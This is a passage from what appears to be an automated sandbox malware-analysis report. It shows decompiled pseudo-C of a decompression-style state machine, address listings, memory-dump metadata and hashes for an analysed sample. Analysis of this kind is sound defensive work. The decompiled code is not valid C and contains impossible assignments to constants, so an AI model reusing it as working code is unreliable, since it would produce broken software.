												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406ffe
0x00406ffe
0x00407002
0x00407023
0x0040702a
0x00407030
0x00407036
0x00407048
0x0040704e
0x00407053
0x00000000
0x00407004
0x0040700a
0x004073cb
0x004073cb
0x004073cb
0x004073ce
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x0040741c
0x00407420
0x004075cf
0x004075e5
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00407601
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00407447
0x00407447
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00000000
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcf
0x00000000
0x00406db1
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00406dc8
0x00000000
0x00000000
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00407447
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00407447
0x00407447
0x00000000
0x0040744d
0x00407447
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00407447
0x004073ce
0x004073cb
0x00000000
0x00407002

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05

Uniqueness

Uniqueness Score: -1.00%

Function 0040711C Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040711C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
